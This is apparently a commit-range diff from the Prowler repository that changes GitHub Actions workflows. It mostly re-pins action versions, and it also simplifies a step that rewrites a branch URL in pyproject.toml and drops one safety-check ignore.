fix(ci): prevent grep exit code 1 from failing empty dir check

- Add || true to grep -v that filters empty lines from VALID_PATHS - GitHub Actions bash uses set -eo pipefail, so grep returning 1 (no matches) killed the script before reaching the graceful exit 0
test(ci): add path resolution tests and architecture documentation
2026-05-19 10:43:03 +00:00 · 2026-03-12 11:33:33 +01:00 · 2026-03-12 10:13:00 +01:00 · 2026-03-12 09:58:41 +01:00
398 changed files with 3580 additions and 20833 deletions
@@ -26,18 +26,10 @@ runs:
      if: github.event_name == 'pull_request' && github.base_ref == 'master' && github.repository == 'prowler-cloud/prowler'
      shell: bash
      working-directory: ${{ inputs.working-directory }}
-      env:
-        HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
      run: |
        BRANCH_NAME="${GITHUB_HEAD_REF:-${GITHUB_REF_NAME}}"
-        UPSTREAM="prowler-cloud/prowler"
-        if [ "$HEAD_REPO" != "$UPSTREAM" ]; then
-          echo "Fork PR detected (${HEAD_REPO}), rewriting VCS URL to fork"
-          sed -i "s|git+https://github.com/prowler-cloud/prowler\([^@]*\)@master|git+https://github.com/${HEAD_REPO}\1@$BRANCH_NAME|g" pyproject.toml
-        else
-          echo "Same-repo PR, using branch: $BRANCH_NAME"
-          sed -i "s|\(git+https://github.com/prowler-cloud/prowler[^@]*\)@master|\1@$BRANCH_NAME|g" pyproject.toml
-        fi
+        echo "Using branch: $BRANCH_NAME"
+        sed -i "s|\(git+https://github.com/prowler-cloud/prowler[^@]*\)@master|\1@$BRANCH_NAME|g" pyproject.toml

    - name: Install poetry
      shell: bash
@@ -28,7 +28,7 @@ jobs:
      current_api_version: ${{ steps.get_api_version.outputs.current_api_version }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -80,7 +80,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -118,7 +118,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for next API minor version to master
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -137,7 +137,7 @@ jobs:
            By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.

      - name: Checkout version branch
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: v${{ needs.detect-release-type.outputs.major_version }}.${{ needs.detect-release-type.outputs.minor_version }}
          persist-credentials: false
@@ -177,7 +177,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for first API patch version to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -205,7 +205,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -255,7 +255,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for next API patch version to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -33,14 +33,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for API changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            api/**
@@ -42,17 +42,17 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Initialize CodeQL
-        uses: github/codeql-action/init@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4.32.4
+        uses: github/codeql-action/init@5d4e8d1aca955e8d8589aabd499c5cae939e33c7 # v4.31.9
        with:
          languages: ${{ matrix.language }}
          config-file: ./.github/codeql/api-codeql-config.yml

      - name: Perform CodeQL Analysis
-        uses: github/codeql-action/analyze@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4.32.4
+        uses: github/codeql-action/analyze@5d4e8d1aca955e8d8589aabd499c5cae939e33c7 # v4.31.9
        with:
          category: '/language:${{ matrix.language }}'
@@ -57,7 +57,7 @@ jobs:
      message-ts: ${{ steps.slack-notification.outputs.ts }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -95,12 +95,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -111,7 +111,7 @@ jobs:
      - name: Build and push API container for ${{ matrix.arch }}
        id: container-push
        if: github.event_name == 'push' || github.event_name == 'release' || github.event_name == 'workflow_dispatch'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: ${{ env.WORKING_DIRECTORY }}
          push: true
@@ -129,7 +129,7 @@ jobs:

    steps:
      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -161,7 +161,7 @@ jobs:

      - name: Install regctl
        if: always()
-        uses: regclient/actions/regctl-installer@da9319db8e44e8b062b3a147e1dfb2f574d41a03 # main
+        uses: regclient/actions/regctl-installer@f61d18f46c86af724a9c804cb9ff2a6fec741c7c # main

      - name: Cleanup intermediate architecture tags
        if: always()
@@ -180,7 +180,7 @@ jobs:
    timeout-minutes: 5
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -28,14 +28,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check if Dockerfile changed
        id: dockerfile-changed
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: api/Dockerfile

@@ -66,14 +66,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for API changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: api/**
          files_ignore: |
@@ -88,7 +88,7 @@ jobs:

      - name: Build container for ${{ matrix.arch }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: ${{ env.API_WORKING_DIR }}
          push: false
@@ -33,14 +33,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for API changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            api/**
@@ -64,9 +64,8 @@ jobs:

      - name: Safety
        if: steps.check-changes.outputs.any_changed == 'true'
-        run: poetry run safety check --ignore 79023,79027,86217
+        run: poetry run safety check --ignore 79023,79027
        # TODO: 79023 & 79027 knack ReDoS until `azure-cli-core` (via `cartography`) allows `knack` >=0.13.0
-        # TODO: 86217 because `alibabacloud-tea-openapi == 0.4.3` don't let us upgrade `cryptography >= 46.0.0`

      - name: Vulture
        if: steps.check-changes.outputs.any_changed == 'true'
@@ -73,14 +73,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for API changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            api/**
@@ -34,7 +34,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -28,7 +28,7 @@ jobs:
      current_docs_version: ${{ steps.get_docs_version.outputs.current_docs_version }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -80,7 +80,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -114,7 +114,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for documentation update to master
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -137,7 +137,7 @@ jobs:
            By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.

      - name: Checkout version branch
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: v${{ needs.detect-release-type.outputs.major_version }}.${{ needs.detect-release-type.outputs.minor_version }}
          persist-credentials: false
@@ -174,7 +174,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for documentation update to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -205,7 +205,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -245,7 +245,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for documentation update to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -23,7 +23,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          fetch-depth: 0
          persist-credentials: false
@@ -56,7 +56,7 @@ jobs:
      message-ts: ${{ steps.slack-notification.outputs.ts }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -93,12 +93,12 @@ jobs:
      packages: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -109,7 +109,7 @@ jobs:
      - name: Build and push MCP container for ${{ matrix.arch }}
        id: container-push
        if: github.event_name == 'push' || github.event_name == 'release' || github.event_name == 'workflow_dispatch'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: ${{ env.WORKING_DIRECTORY }}
          push: true
@@ -135,7 +135,7 @@ jobs:

    steps:
      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -186,7 +186,7 @@ jobs:
    timeout-minutes: 5
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -28,14 +28,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check if Dockerfile changed
        id: dockerfile-changed
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: mcp_server/Dockerfile

@@ -65,14 +65,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for MCP changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: mcp_server/**
          files_ignore: |
@@ -85,7 +85,7 @@ jobs:

      - name: Build MCP container for ${{ matrix.arch }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: ${{ env.MCP_WORKING_DIR }}
          push: false
@@ -60,7 +60,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -70,7 +70,7 @@ jobs:
          enable-cache: false

      - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ env.PYTHON_VERSION }}

@@ -29,7 +29,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          fetch-depth: 0
          # zizmor: ignore[artipacked]
@@ -37,7 +37,7 @@ jobs:

      - name: Get changed files
        id: changed-files
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: |
            api/**
@@ -26,7 +26,7 @@ jobs:

    steps:
      - name: Checkout PR head
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: ${{ github.event.pull_request.head.sha }}
          fetch-depth: 0
@@ -34,7 +34,7 @@ jobs:

      - name: Get changed files
        id: changed-files
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: '**'

@@ -27,14 +27,14 @@ jobs:
      pull-requests: write
    steps:
    - name: Checkout repository
-      uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+      uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
      with:
        fetch-depth: 0
        token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
        persist-credentials: false

    - name: Set up Python
-      uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+      uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
      with:
        python-version: '3.12'

@@ -345,7 +345,7 @@ jobs:

    - name: Create PR for API dependency update
      if: ${{ env.PATCH_VERSION == '0' }}
-      uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+      uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
      with:
        token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
        commit-message: 'chore(api): update prowler dependency to ${{ env.BRANCH_NAME }} for release ${{ env.PROWLER_VERSION }}'
@@ -67,7 +67,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -96,7 +96,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for next minor version to master
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -115,7 +115,7 @@ jobs:
            By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.

      - name: Checkout version branch
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          ref: v${{ needs.detect-release-type.outputs.major_version }}.${{ needs.detect-release-type.outputs.minor_version }}
          persist-credentials: false
@@ -148,7 +148,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for first patch version to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -176,7 +176,7 @@ jobs:
      pull-requests: write
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -211,7 +211,7 @@ jobs:
          git --no-pager diff

      - name: Create PR for next patch version to version branch
-        uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
+        uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 # v8.0.0
        with:
          author: prowler-bot <179230569+prowler-bot@users.noreply.github.com>
          token: ${{ secrets.PROWLER_BOT_ACCESS_TOKEN }}
@@ -20,7 +20,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -31,14 +31,14 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          # zizmor: ignore[artipacked]
          persist-credentials: true # Required by tj-actions/changed-files to fetch PR branch

      - name: Check for SDK changes
        id: check-changes
-        uses: tj-actions/changed-files@7dee1b0c1557f278e5c7dc244927139d78c0e22a # v47.0.4
+        uses: tj-actions/changed-files@e0021407031f5be11a464abee9a0776171c79891 # v47.0.1
        with:
          files: ./**
          files_ignore: |
@@ -67,7 +67,7 @@ jobs:

      - name: Set up Python ${{ matrix.python-version }}
        if: steps.check-changes.outputs.any_changed == 'true'
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ matrix.python-version }}
          cache: 'poetry'
@@ -49,17 +49,17 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Initialize CodeQL
-        uses: github/codeql-action/init@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4.32.4
+        uses: github/codeql-action/init@5d4e8d1aca955e8d8589aabd499c5cae939e33c7 # v4.31.9
        with:
          languages: ${{ matrix.language }}
          config-file: ./.github/codeql/sdk-codeql-config.yml

      - name: Perform CodeQL Analysis
-        uses: github/codeql-action/analyze@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4.32.4
+        uses: github/codeql-action/analyze@5d4e8d1aca955e8d8589aabd499c5cae939e33c7 # v4.31.9
        with:
          category: '/language:${{ matrix.language }}'
@@ -61,12 +61,12 @@ jobs:
      stable_tag: ${{ steps.get-prowler-version.outputs.stable_tag }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
        with:
          python-version: ${{ env.PYTHON_VERSION }}

@@ -117,7 +117,7 @@ jobs:
      message-ts: ${{ steps.slack-notification.outputs.ts }}
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

@@ -155,18 +155,18 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
        with:
          persist-credentials: false

      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}

      - name: Login to Public ECR
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          registry: public.ecr.aws
          username: ${{ secrets.PUBLIC_ECR_AWS_ACCESS_KEY_ID }}
@@ -180,7 +180,7 @@ jobs:
      - name: Build and push SDK container for ${{ matrix.arch }}
        id: container-push
        if: github.event_name == 'push' || github.event_name == 'release' || github.event_name == 'workflow_dispatch'
-        uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6.19.2
+        uses: docker/build-push-action@263435318d21b8e681c14492fe198d362a7d2c83 # v6.18.0
        with:
          context: .
          file: ${{ env.DOCKERFILE_PATH }}
@@ -199,13 +199,13 @@ jobs:

    steps:
      - name: Login to DockerHub
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}

      - name: Login to Public ECR
-        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3.7.0
+        uses: docker/login-action@5e57cd118135c172c3672efd75eb46360885c0ef # v3.6.0
        with:
          registry: public.ecr.aws
          username: ${{ secrets.PUBLIC_ECR_AWS_ACCESS_KEY_ID }}
@@ -266,7 +266,7 @@ jobs:
    timeout-minutes: 5
    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
